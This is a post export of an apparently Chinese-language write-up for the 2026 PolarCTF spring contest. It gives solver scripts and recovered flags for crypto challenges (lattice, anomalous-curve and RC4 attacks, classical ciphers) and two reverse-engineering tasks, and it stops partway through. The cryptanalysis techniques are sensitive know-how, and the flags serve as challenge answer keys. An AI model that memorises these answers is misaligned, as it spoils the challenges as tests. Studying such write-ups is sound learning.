{"id":3072,"date":"2026-03-22T19:52:32","date_gmt":"2026-03-22T11:52:32","guid":{"rendered":"https:\/\/www.sanjiuctf.cn\/?p=3072"},"modified":"2026-03-22T19:52:33","modified_gmt":"2026-03-22T11:52:33","slug":"2026polarctf%e6%98%a5%e5%ad%a3%e8%b5%9bwp","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.cn\/?p=3072","title":{"rendered":"2026PolarCTF\u6625\u5b63\u8d5bwp"},"content":{"rendered":"\n

\u524d\u8a00<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u62ff\u4e86\u7b2c\u4e8c\u540d\uff0c\u9898\u76ee\u96be\u5ea6\u4e0d\u5927\uff0c\u4f46\u662f\u9898\u76ee\u6570\u91cf\u662f\u771f\u7684\u591a\uff0c\u800c\u4e14\u5e73\u53f0\u5bb9\u5668\u8d85\u7ea7\u5361\uff0c\u6bd4\u8d5b\u65f6\u95f4\u662f2026\u5e743\u670821\u65e5 9:00-21:00 \u81f3\u5c11\u67094\u6216\u80055\u4e2a\u5c0f\u65f6 \u5bb9\u5668\u662f\u6253\u4e0d\u5f00\u7684\uff0c\u800c\u4e14\u53ea\u6709\u4e09\u4e2a\u5c0f\u65f6\u5199wp\uff0cweb\u89e3\u7684\u5c11\u56e0\u4e3a\u5bb9\u5668\u542f\u52a8\u4e00\u4e2a\u975e\u5e38\u96be\u542f\u52a8\uff0c\u7eaf\u7eaf\u6d6a\u8d39\u65f6\u95f4,\u771f\u70e6\u4eba\u5bb9\u5668\u9898\u76ee\u5148\u89e3\u7684pwn\uff0cpwn\u662fak\u4e86\uff0c\u4e0b\u9762\u6ca1\u6709\u5f04\u590d\u73b0\u7684\u9898\u76ee\uff0c\u5168\u662f\u6bd4\u8d5b\u671f\u95f4\u89e3\u51fa\u7684wp\uff0c\u6ca1\u6709\u5199\u590d\u73b0\u7684<\/p>\n\n\n\n

\u7269\u8054\u7f51\u7684\u9898\u76ee\u662f\u771f\u7684\u4e0d\u4f1a,\u6ca1\u6709\u5b66\u8fc7<\/p>\n\n\n\n

Crypto<\/h1>\n\n\n\n

\u767e\u4e07\u8d4f\u91d1<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5f88\u7b80\u5355\u76f4\u63a5\u811a\u672c \u904d\u5386\u5c31\u884c<\/p>\n\n\n\n

exp.py<\/p>\n\n\n\n

def decrypt_rail_fence(cipher, key):\n    n = len(cipher)\n    matrix = [[''] * n for _ in range(key)]\n    row, step = 0, 1\n    for col in range(n):\n        matrix[row][col] = '*'\n        if row == 0:\n            step = 1\n        elif row == key - 1:\n            step = -1\n        row += step\n\n    idx = 0\n    for r in range(key):\n        for c in range(n):\n            if matrix[r][c] == '*' and idx < n:\n                matrix[r][c] = cipher[idx]\n                idx += 1\n\n    row, step = 0, 1\n    res = []\n    for col in range(n):\n        res.append(matrix[row][col])\n        if row == 0:\n            step = 1\n        elif row == key - 1:\n            step = -1\n        row += step\n    return ''.join(res)\n\ndef decrypt_caesar(text, shift):\n    res = []\n    for c in text:\n        if c.isupper():\n            res.append(chr((ord(c) - 65 - shift) % 26 + 65))\n        elif c.islower():\n            res.append(chr((ord(c) - 97 - shift) % 26 + 97))\n        else:\n            res.append(c)\n    return ''.join(res)\n\nciphertext = \"DFGNBSZNGNMKFF\"\nfor k in range(2, 5):\n    rail_dec = decrypt_rail_fence(ciphertext, k)\n    for s in range(1, 11):\n        plain = decrypt_caesar(rail_dec, s)\n        print(f\"Key: {k} | Shift: {s:<2} | Flag: {plain}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0YIBAIWANHAFUBI \u662f\u6709\u610f\u4e49\u7684<\/p>\n\n\n\n
\u4e00\u767e\u4e07\u54c8\u592b\u5e01<\/p>\n\n\n\n
flag{YIBAIWANHAFUBI}<\/code><\/pre>\n\n\n\n
\u51b0\u539f\u4e0a\u7684OTP\u8c1c\u9898<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u8be6\u7ec6\u63cf\u8ff0\u4e86\u660e\u6587\uff08`winter_polarctf`\uff09\u548c\u5bc6\u94a5\uff08`ice` \u91cd\u590d\uff09\u7684\u751f\u6210\u89c4\u5219\uff0c\u5e76\u4e14\u63d0\u5230\u5c06\u5f02\u6216\u7ed3\u679c\u6309\u201c\u7b2c 7 \u4f4d --> \u7b2c 0 \u4f4d\u201d\u7684\u9519\u8bef\u987a\u5e8f\u62fc\u63a5\u6210\u4e86\u5bc6\u6587\u3002\n\n\u5b9e\u9645\u4e0a\uff0c\u5982\u679c\u6309\u7167\u660e\u6587\u548c\u5bc6\u94a5\u53bb\u91cd\u65b0\u5f02\u6216\uff0c\u4f1a\u53d1\u73b0\u5f97\u5230\u7684\u7ed3\u679c\u4e0e\u9898\u76ee\u7ed9\u51fa\u7684\u4e8c\u8fdb\u5236\u4e32\u6839\u672c\u5bf9\u4e0d\u4e0a\uff081\u7684\u6570\u91cf\u4e0d\u540c\uff09\u3002\u51fa\u9898\u4eba\u5728\u751f\u6210\u8fd9\u4e32\u5df2\u77e5\u5bc6\u6587\u65f6\uff0c\u53ef\u80fd\u6df7\u5165\u4e86\u5176\u4ed6\u7684\u672a\u77e5\u903b\u8f91\u6216\u9519\u8bef\u3002\n\n\u5173\u952e\u5728\u4e8e\uff1a\u9898\u76ee\u5df2\u7ecf\u7ed9\u51fa\u4e86\u90a3\u4e32\u9519\u8bef\u62fc\u63a5\u7684 128 \u4f4d\u4e8c\u8fdb\u5236\u4e32\uff0c\u4e14\u6700\u7ec8\u8981\u6c42\u53ea\u662f\u8fd8\u539f\u6309\u6b63\u786e\u987a\u5e8f\uff08\u7b2c 0 \u4f4d --> \u7b2c 7 \u4f4d\uff09\u62fc\u63a5\u7684\u5bc6\u6587\u5341\u516d\u8fdb\u5236\u3002\n\n\u6240\u4ee5\u6211\u4eec\u6839\u672c\u4e0d\u9700\u8981\u53bb\u78b0\u660e\u6587\u548c\u5bc6\u94a5\uff0c\u76f4\u63a5\u5bf9\u7ed9\u5b9a\u7684\u4e8c\u8fdb\u5236\u4e32\u8fdb\u884c\u9006\u5411\u64cd\u4f5c\u5373\u53ef\u3002\u5c06\u7ed9\u5b9a\u7684 128 \u4f4d\u4e8c\u8fdb\u5236\u4e32\u6309 8 \u4f4d\uff081 \u5b57\u8282\uff09\u8fdb\u884c\u5206\u7ec4\uff0c\u628a\u6bcf\u4e00\u7ec4\u7684 8 \u4e2a\u4e8c\u8fdb\u5236\u4f4d\u5012\u5e8f\u7ffb\u8f6c\uff08\u4ece 7->0 \u7ea0\u6b63\u4e3a 0->7\uff09\uff0c\u7136\u540e\u8f6c\u6362\u6210\u5341\u516d\u8fdb\u5236\u62fc\u63a5\u8d77\u6765\uff0c\u5c31\u662f\u6700\u7ec8\u7684 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
s = \"11010110100101101110100110101100011001010100101110111001110110110111011001011001110011011011010111001011100011010101110111101011\"\n\nflag = \"\"\nfor i in range(0, len(s), 8):\n    chunk = s[i:i+8]\n    flag += f\"{int(chunk[::-1], 2):02x}\"\n\nprint(f\"flag{{{flag}}}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{6b699735a6d29ddb6e9ab3add3b1bad7}<\/code><\/pre>\n\n\n\n
\u4f2aASR<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9ad8\u6b21\u5269\u4f59\u5bc6\u7801\u7cfb\u7edf\uff0c\u5206\u89e3\u7d20\u6570\u662f\u9519\u7684<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
1\uff1a\u5927\u6570\u5206\u89e3\u7684\u7ed3\u6784\u6027\u7f3a\u9677
$$
\u9898\u76ee\u751f\u6210 pp \u7684\u903b\u8f91\u662f p=279\u22c5r+1p=279\u22c5r+1\uff0c\u5176\u4e2d rr \u53ea\u6709 70 bit \u957f
$$
\u8fd9\u610f\u5473\u7740 pp \u7684\u9ad8\u4f4d\u662f\u5b8c\u5168\u5df2\u77e5\u7684\u3002\u867d\u7136 nn \u6709 300 bit \u5bfc\u81f4\u5e38\u89c4\u5de5\u5177\uff08\u5982 yafu\uff09\u5206\u89e3\u6781\u6162\u6216\u5d29\u6e83<\/p>\n\n\n\n
\u4f46\u6211\u4eec\u53ef\u4ee5\u5229\u7528 LLL \u683c\u57fa\u89c4\u7ea6 \u6784\u9020\u591a\u9879\u5f0f
$$
f(x)=279x+1(modn)f(x)=279x+1(modn)
$$
\u5feb\u901f\u6c42\u51fa rr \u4ece\u800c\u6062\u590d pp<\/p>\n\n\n\n
2\uff1a\u76f2\u5316\u56e0\u5b50\u7684\u6d88\u9664
$$
\u5bc6\u6587\u6784\u9020\u4e3a c=ym\u22c5x279(modn)c=ym\u22c5x279(modn)
$$<\/p>\n\n\n\n
$$
\u5229\u7528\u6b27\u62c9\u964d\u9636\u601d\u60f3\uff0c\u6211\u4eec\u5728\u6a21 pp \u4e0b\u5bf9\u5bc6\u6587\u6c42 rp=(p\u22121)\/279rp\u200b=(p\u22121)\/279 \u6b21\u65b9\u3002
$$<\/p>\n\n\n\n
\u6839\u636e\u8d39\u9a6c\u5c0f\u5b9a\u7406\uff1a
$$
(x279)rp\u2261xp\u22121\u22611(modp)(x279)rp\u200b\u2261xp\u22121\u22611(modp)\u3002
$$
\u968f\u673a\u76f2\u5316\u56e0\u5b50 xx \u88ab\u5b8c\u7f8e\u6d88\u9664\uff0c\u7b49\u5f0f\u5316\u7b80\u4e3a\uff1a
$$
c\u2032\u2261(y\u2032)m(modp)c\u2032\u2261(y\u2032)m(modp)\u3002
$$
3\uff1a\u6309\u4f4d\u7206\u7834<\/p>\n\n\n\n
\u964d\u9636\u540e\u7684\u7fa4\u751f\u6210\u5143 y\u2032y\u2032 \u9636\u6570\u6070\u597d\u4e3a<\/p>\n\n\n\n
2\u768479\u6b21\u65b9*279<\/p>\n\n\n\n
\u7531\u4e8e\u9636\u6570\u662f 2 \u7684\u5e42\u6b21\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528 Pohlig-Hellman \u7b97\u6cd5\u7684\u4e8c\u5143\u53d8\u4f53\uff0c\u4ece\u4f4e\u5230\u9ad8\u9010\u4e2a\u6bd4\u7279\uff08bit by bit\uff09\u628a\u660e\u6587 mm \u8fd8\u539f\u51fa\u6765\u3002<\/p>\n\n\n\n
exp.sage<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes\n\nn = 500532925884017190157531654042977388637611201227338971326884172046371105194776392356795147\ny = 213088474978954913521695933149257926315459990908578573756933176330915972508162260163992936\ncs = [57494912618263048538571755953837772127117773898872797680570116373460237301011181142984690, \n      344186007342959044249362172584754916978318670779607618696087105142714882053499189453591750, \n      11170932486684627637967687021711067484959106608189352734064089980678923008744240797135422, \n      73837068555811384284867151570572743386582880055013744261872093001909203963879165023864836, \n      64356403000986744386743473269071732498867064770469172347340097989063717305436807805878673]\nk = 79\n\nP.<x> = PolynomialRing(Zmod(n))\nf = (2^k) * x + 1\nroots = f.monic().small_roots(X=2^70, beta=0.49, epsilon=0.015)\nr_p = Integer(roots[0])\np = Integer((2^k) * r_p + 1)\nrp_val = (p - 1) \/\/ (2^k)\n\ndef solve_dlp(c):\n    cp, yp, pp = int(c % p), int(y % p), int(p)\n    c_i = pow(cp, int(rp_val), pp)\n    y_inv = pow(pow(yp, int(rp_val), pp), -1, pp)\n    m = 0\n\n    for i in range(k):\n        test_val = pow(c_i, 2**(k - 1 - i), pp)\n        bit = 1 if test_val == pp - 1 else 0\n        m |= (bit << i)\n        if bit == 1:\n            c_i = (c_i * pow(y_inv, 2**i, pp)) % pp\n\n    return m\n\nflag = \"\".join([long_to_bytes(solve_dlp(c)).decode(errors='ignore') for c in cs])\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{go0_j06!let1sm0v31n_t0_th3renges~>_<}<\/code><\/pre>\n\n\n\n
ECC\u7684\u653b\u51fb\u6a21\u5757<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f02\u5e38\u692d\u5706\u66f2\u7ebf \u548c\u591a\u7ef4\u9690\u85cf\u6570\u95ee\u9898 (HNP\/\u6b63\u4ea4\u683c\u89c4\u7ea6)<\/p>\n\n\n\n
\u52a0\u5bc6<\/p>\n\n\n\n
\u9898\u76ee\u9690\u53bb\u4e86 p, a, b\uff0c\u5728 512 bit \u7684\u968f\u673a\u66f2\u7ebf\u4e0a\u751f\u6210\u4e86 73 \u4e2a\u5750\u6807\u70b9\u3002
$$
\u6838\u5fc3\u52a0\u5bc6\u65b9\u7a0b\u4e3a\uff1aQ_i = m_i R + nonce_i E + sh_i C\u3002
$$<\/p>\n\n\n\n
m_i \u662f\u5355\u5b57\u8282\u7684 flag \u5b57\u7b26\uff0c\u524d\u540e\u62fc\u63a5\u4e86 `urandom(8)` \u548c `x00` \u8fdb\u884c\u4e86 padding\u3002\n\n\u7531\u4e8e\u968f\u673a\u751f\u6210\u5e76\u9690\u85cf\u4e86\u53c2\u6570\uff0c\u8fd9\u5927\u6982\u7387\u662f\u4e00\u6761\u5f02\u5e38\u66f2\u7ebf\uff08\u66f2\u7ebf\u9636\u6b63\u597d\u7b49\u4e8e p\uff09\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u6062\u590d\u66f2\u7ebf\u53c2\u6570 p, a, b
$$
\u5df2\u77e5\u591a\u4e2a\u5750\u6807\u90fd\u5728\u540c\u4e00\u66f2\u7ebf\u4e0a\uff0c\u6ee1\u8db3 y_i^2 – x_i^3 = a x_i + b pmod p
$$
\u53d6\u4e09\u4e2a\u70b9\u6d88\u53bb a \u548c b\uff0c\u53ef\u4ee5\u5f97\u5230 p \u7684\u500d\u6570\uff08\u884c\u5217\u5f0f\uff09\u3002\u7b97\u591a\u7ec4\u884c\u5217\u5f0f\u6c42 GCD \u5373\u53ef\u6062\u590d\u51fa p\uff0c\u4ee3\u56de\u7b97\u5f97 a \u548c b\u3002<\/p>\n\n\n\n
\u56e0\u4e3a\u662f\u5f02\u5e38\u66f2\u7ebf\uff0cECDLP \u88ab\u964d\u7ef4\u6253\u51fb\u3002\u4f7f\u7528 p\u8fdb\u6570\u57df
$$
mathbb{Q}_p\u8fdb\u884c Hensel lift
$$
\u89c4\u907f\u6c42\u5bfc\u65f6\u7684\u96640\u95ee\u9898\uff0c\u628a\u692d\u5706\u66f2\u7ebf\u70b9\u4e58\u8f6c\u6362\u4e3a\u6a21 p \u4e0a\u7684\u7ebf\u6027\u65b9\u7a0b\uff1a
$$
h_i equiv m_i R’ + nonce_i E’ + sh_i C’ pmod p
$$
\u591a\u7ef4 HNP \u4e0e\u6b63\u4ea4\u683c\u89c4\u7ea6
$$
\u4e0a\u8ff0\u7ebf\u6027\u65b9\u7a0b\u4e2d\uff0c\u57fa\u70b9\u7684\u6620\u5c04\u503c R’, E’, C’ \u662f\u4e09\u4e2a\u672a\u77e5\u5168\u5c40\u5e38\u91cf
$$
\u6784\u9020\u6b63\u4ea4\u683c\u77e9\u9635\u6c42 Left Kernel\uff08\u5373\u8ba1\u7b97\u53f3\u6838\uff09\uff0c\u76f4\u63a5\u6d88\u53bb\u8fd9\u4e09\u4e2a\u672a\u77e5\u6570\u6240\u5728\u7684\u7ef4\u5ea6\u3002\u6700\u540e\u5bf9 kernel \u7684\u57fa\u6267\u884c LLL \u89c4\u7ea6\uff0c\u5c06\u9ad8\u4f4d\u7684 0 padding \u9694\u79bb\uff0c\u76f4\u63a5\u63d0\u53d6\u51fa\u5904\u4e8e\u6700\u4f4e\u4f4d\u7684 flag \u5b57\u7b26\u3002<\/p>\n\n\n\n
exp.sage<\/p>\n\n\n\n
import re\nfrom sage.all import *\n\ndef parse_coordinates(filename):\n    try:\n        with open(filename, 'r', encoding='utf-8') as f:\n            content = f.read()\n    except FileNotFoundError:\n        return []\n    matches = re.findall(r'((d+)s*,s*(d+))', content)\n    x_coords = []\n    for match in matches:\n        x_coords.append((ZZ(match[0]), ZZ(match[1])))\n    return x_coords\n\ndef solve():\n    x_coords = parse_coordinates('\u5750\u6807.txt')\n    if not x_coords:\n        return\n\n    X = [P[0] for P in x_coords]\n    Y = [P[1] for P in x_coords]\n    E_vals = [Y[i]^2 - X[i]^3 for i in range(len(x_coords))]\n\n    p_mults = []\n    for i in range(len(x_coords) - 3):\n        D = X[i]*(E_vals[i+1] - E_vals[i+2]) - X[i+1]*(E_vals[i] - E_vals[i+2]) + X[i+2]*(E_vals[i] - E_vals[i+1])\n        if D != 0:\n            p_mults.append(D)\n\n    p = p_mults[0]\n    for mult in p_mults[1:]:\n        p = gcd(p, mult)\n\n    while p % 2 == 0: p \/\/= 2\n    while p % 3 == 0: p \/\/= 3\n\n    a = (E_vals[0] - E_vals[1]) * inverse_mod(X[0] - X[1], p) % p\n    b = (E_vals[0] - a*X[0]) % p\n\n    Eqp = EllipticCurve(Qp(p, 2), [ZZ(a), ZZ(b)])\n    h_vals = []\n    for P in x_coords:\n        Px, Py = P[0], P[1]\n        P_qp = Eqp.lift_x(Px)\n        if GF(p)(P_qp[1]) != GF(p)(Py):\n            P_qp = -P_qp\n        pP = p * P_qp\n        x, y = pP[0], pP[1]\n        val = (ZZ(- (x\/y)) \/\/ p) % p\n        h_vals.append(val)\n\n    k = len(h_vals)\n    M = Matrix(ZZ, k, k)\n    inv_hk = inverse_mod(h_vals[-1], p)\n\n    for i in range(k-1):\n        M[i, i] = 1\n        M[i, k-1] = (-h_vals[i] * inv_hk) % p\n    M[k-1, k-1] = p\n\n    red_M = M.LLL()\n    W_rows = red_M[:k-3]\n    W_mat = Matrix(ZZ, W_rows)\n\n    kernel = W_mat.right_kernel()\n    B = Matrix(ZZ, kernel.basis())\n    B_red = B.LLL()\n\n    for row in B_red:\n        for sign in [1, -1]:\n            flag_str = b\"\"\n            for val in row:\n                char = (sign * val) % 256\n                if 32 <= char <= 126 or char == ord('}'):\n                    flag_str += bytes([char])\n                else:\n                    break\n\n            if len(flag_str) == k and b\"flag\" in flag_str:\n                print(flag_str.decode())\n                return\n\nsolve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{893d041e-c0a2-3145-5320-cdee7d3c87fb}<\/code><\/pre>\n\n\n\n
\u535a\u58eb\u7684\u5b9e\u9a8c\u6570\u636e<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u627e\u5bc6\u94a5\u5c31\u662f\u89e3\u4e2a\u6a2126\u7684\u540c\u4f59\u65b9\u7a0b\u7ec4\u3002\u9898\u76ee\u7ed9\u4e86\u4e24\u7ec4\u660e\u5bc6\u6587\u5bf9\uff1aT(19)->X(23)\uff0cF(5)->J(9)\u3002<\/p>\n\n\n\n
\u76f4\u63a5\u4ee3\u5165\u516c\u5f0f y \u2261 (ax + b) mod 26<\/code>\uff1a<\/p>\n\n\n\n
19a + b \u2261 23 mod 26<\/p>\n\n\n\n
5a + b \u2261 9 mod 26<\/p>\n\n\n\n
\u4e24\u5f0f\u76f8\u51cf\u6d88\u6389b\uff1a14a \u2261 14 mod 26\u3002\n\u56e0\u4e3a\u9898\u76ee\u8981\u6c42a\u548c26\u4e92\u8d28\uff0c\u89e3\u51fa\u552f\u4e00\u5408\u6cd5\u5bc6\u94a5 a = 1\u3002\n\u628a a = 1 \u4ee3\u51652\u5f0f\uff1a5 + b \u2261 9\uff0c\u5f97\u51fa b = 4\u3002\n\n\u5bc6\u94a5\u6c42\u51fa\u6765\u4e86\uff0ca=1\uff0cb=4\u3002\u8fd9\u5c31\u662f\u4e2a\u504f\u79fb\u91cf\u4e3a4\u7684\u51ef\u6492\u5bc6\u7801\u3002\n\u89e3\u5bc6\u516c\u5f0f\u5c31\u662f\uff1ax \u2261 (y - 4) mod 26\u3002\u76f4\u63a5\u62ff\u53bb\u8dd1\u5bc6\u6587\u5c31\u884c\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
c = \"QJBXQJFXZAKL\"\np = \"\"\n\nfor i in c:\n    y = ord(i) - 65\n    x = (y - 4) % 26\n    p += chr(x + 65)\n\nprint(p)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
MFXTMFBTVWGH<\/code><\/pre>\n\n\n\n
RC4\u7684\u5bc6\u94a5\u6d41\u6cc4\u9732<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
RC4\u6d41\u5bc6\u7801\u539f\u7406\u3001\u5f02\u6216\u8fd0\u7b97\u3001\u5e72\u6270\u9879\u8bc6\u522b<\/p>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u68b3\u7406\u9898\u610f\uff0cRC4\u7684\u52a0\u5bc6\u539f\u7406\u662f\uff1a\u5bc6\u6587 = \u660e\u6587 \u2295 \u5bc6\u94a5\u6d41\u3002\u540c\u7406\u63a8\u5bfc\u53ef\u77e5\uff1a\u5bc6\u94a5\u6d41 = \u660e\u6587 \u2295 \u5bc6\u6587\u3002\n\u89c2\u5bdf\u9898\u76ee\u7ed9\u7684\u5df2\u77e5\u5bc6\u6587 54 65 73 74 44...\uff0c\u5c06\u5176\u5341\u516d\u8fdb\u5236\u76f4\u63a5\u8f6c\u4e3aASCII\u5b57\u7b26\u4e32\u540e\uff0c\u53d1\u73b0\u7ed3\u679c\u5c31\u662f TestData_ForRC4_Decrypt\uff0c\u4e0e\u5df2\u77e5\u660e\u6587\u5b8c\u5168\u4e00\u81f4\u3002\n\u65e2\u7136\u660e\u6587\u548c\u5bc6\u6587\u957f\u5f97\u4e00\u6a21\u4e00\u6837\uff0c\u8bf4\u660e\u5f02\u6216\u7684\u5bc6\u94a5\u6d41\u5168\u90e8\u4e3a 0\uff08\u4efb\u4f55\u6570\u5f02\u62160\u7b49\u4e8e\u672c\u8eab\uff09\u3002\n\u660e\u786e\u4e86\u5bc6\u94a5\u6d41\u4e3a0\uff0c\u76ee\u6807\u5bc6\u6587 C_flag \u76f4\u63a5\u5c06\u5176\u5341\u516d\u8fdb\u5236\u8f6c\u56de\u5b57\u7b26\u4e32\uff0c\u5c31\u662f\u6700\u7ec8\u7684flag\u3002\n\u9898\u76ee\u540e\u534a\u90e8\u5206\u7ed9\u7684RSA\u53c2\u6570\uff08e\u3001n\u3001c\uff09\u4e3aRSA\u975e\u5bf9\u79f0\u52a0\u5bc6\u53c2\u6570\uff0c\u4e0eRC4\u6d41\u5bc6\u7801\u5f02\u6216\u7684\u903b\u8f91\u6ca1\u6709\u5173\u7cfb\u54c8<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
p_known = b\"TestData_ForRC4_Decrypt\"\nc_known_hex = \"54 65 73 74 44 61 74 61 5F 46 6F 72 52 43 34 5F 44 65 63 72 79 70\"\nc_flag_hex = \"66 6C 61 67 7B 70 6F 6C 61 72 5F 6B 69 6E 67 6B 69 6E 67 7D\"\n\nc_known = bytes.fromhex(c_known_hex.replace(\" \", \"\"))\nkeystream = [p ^ c for p, c in zip(p_known, c_known)]\n\nc_flag = bytes.fromhex(c_flag_hex.replace(\" \", \"\"))\nflag = bytes([c_flag[i] ^ keystream[i % len(keystream)] for i in range(len(c_flag))]).decode()\n\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{polar_kingking}<\/code><\/pre>\n\n\n\n
REVERSE<\/h1>\n\n\n\n
\u7ec3\u4e602<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u67e5\u58f3<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
UPX \u8131\u58f3<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f88\u7b80\u5355<\/p>\n\n\n\n
\u7a0b\u5e8f\u5206\u914d\u4e86\u6570\u7ec4 v23, v24, Buffer, v26 \u5e76\u6e05\u96f6\u3002\n\u4f7f\u7528 fgets \u4ece\u6807\u51c6\u8f93\u5165\u8bfb\u53d6\u6700\u591a 256 \u5b57\u8282\u7684\u6570\u636e\u5230 Buffer \u4e2d\uff0c\u5e76\u53bb\u9664\u4e86\u672b\u5c3e\u7684\u6362\u884c\u7b26 n\u3002\n\u5c06 Buffer \u590d\u5236\u5230 v23 \u4e2d\uff0c\u5f00\u59cb\u52a0\u5bc6\u64cd\u4f5c\u3002<\/code><\/pre>\n\n\n\n
\u5148\u51ef\u6492\u5bc6\u7801<\/p>\n\n\n\n
if ( isalpha(v6) )\n{\n  v9 = islower(v8);\n  v10 = 65;\n  if ( v9 )\n    v10 = 97;\n  *v7 = v10 + (v8 - v10 + 7) % 26;\n}<\/code><\/pre>\n\n\n\n
\u7136\u540e\u5728XOR<\/p>\n\n\n\n
\/\/ SIMD \u6279\u91cf\u5f02\u6216 (\u5904\u7406\u957f\u5ea6 >= 64 \u7684\u60c5\u51b5)\nsi128 = (__m128)_mm_load_si128((const __m128i *)&xmmword_1400032D0);\n\/\/ ... _mm_xor_ps ...\n\n\/\/ \u5355\u5b57\u8282\u5faa\u73af\u5f02\u6216 (\u5904\u7406\u5269\u4f59\u4e0d\u8db3 64 \u5b57\u8282\u6216\u603b\u957f\u5ea6\u4e0d\u8db3 64 \u7684\u60c5\u51b5)\nif ( v13 < (__int64)(int)v12 )\n{\n  do\n  {\n    *((_BYTE *)v24 + v19) = *((_BYTE *)v23 + v19) ^ 0x50;\n    ++v19;\n  }\n  while ( v19 < (int)v12 );\n}<\/code><\/pre>\n\n\n\n
\u6d41\u7a0b
$$
\u660e\u6587 rightarrow \u51ef\u6492\u4f4d\u79fb(+7, \u4ec5\u9650\u5b57\u6bcd) rightarrow \u5f02\u6216(0x50, \u5168\u5c40) rightarrow\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32
$$
exp.py<\/p>\n\n\n\n
hint_hex = \"3d23383e2b2a233837243a213b323c202a2628213a253735232a3b22212d\"\ndata = bytes.fromhex(hint_hex)\n\nflag = \"\"\nfor byte in data:\n    x = byte ^ 0x50\n    if ord('a') <= x <= ord('z'):\n        flag += chr((x - ord('a') - 7) % 26 + ord('a'))\n    else:\n        flag += chr(x)\n\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{slazmcjdueisoqjcnzxlsdkj}<\/code><\/pre>\n\n\n\n
\u7ec3\u4e603<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u65e0\u58f3<\/p>\n\n\n\n
\u770bmain<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u786c\u7f16\u7801\u4e86\u4e00\u4e2a\u5b57\u7b26\u4e32 \"secret\"<\/code> \u4f5c\u4e3a\u5bc6\u94a5\uff0c\u957f\u5ea6\u4e3a 6\u3002<\/p>\n\n\n\n
\u63a5\u6536\u8f93\u5165\uff1a \u7a0b\u5e8f\u901a\u8fc7 std::cin<\/code> \u83b7\u53d6\u7528\u6237\u8f93\u5165\u7684 flag\u3002<\/p>\n\n\n\n
\u5faa\u73af\u5f02\u6216<\/p>\n\n\n\n
v12 = *((_BYTE *)v7 + v8) ^ *((_BYTE *)&v33 + v8 % 6);\n\n\u7a0b\u5e8f\u904d\u5386\u8f93\u5165\u7684\u6bcf\u4e00\u4e2a\u5b57\u7b26\uff0c\u5c06\u5176\u4e0e\u5bc6\u94a5 \"secret\" \u5bf9\u5e94\u4f4d\u7f6e\u7684\u5b57\u7b26\u8fdb\u884c\u5f02\u6216\u8fd0\u7b97\u3002v8 % 6 \u786e\u4fdd\u4e86\u5f53\u8f93\u5165\u957f\u5ea6\u8d85\u8fc7\u5bc6\u94a5\u957f\u5ea6\u65f6\uff0c\u5bc6\u94a5\u4f1a\u5faa\u73af\u4f7f\u7528\u3002\n\n\u6700\u540e\u901a\u8fc7 std::setw(v26, 2) \u548c\u6309\u4f4d\u8f93\u51fa\uff0c\u5c06\u52a0\u5bc6\u540e\u7684\u7ed3\u679c\u4ee5\u5341\u516d\u8fdb\u5236\uff08hex\uff09\u683c\u5f0f\u6253\u5370\u51fa\u6765\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f88\u7b80\u5355<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
hex_data = \"0a0c0d151d1d1c0b041e0c151d08061c0200120c0b130a03120b0f17\" \n\ndata = bytes.fromhex(hex_data.strip())\nkey = b\"secret\"\n\nflag = \"\"\nfor i in range(len(data)):\n    flag += chr(data[i] ^ key[i % len(key)])\n\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u538b\u7f29\u5305\u5bc6\u7801<\/p>\n\n\n\n
yingxionglianmengtaihaowanle<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u811a\u672c\u662f\u4e00\u4e2a\u6807\u51c6\u7684 DES ECB \u6a21\u5f0f\u89e3\u5bc6\u8fc7\u7a0b\uff0c\u4f7f\u7528\u4e86 PKCS7 \u586b\u5145<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
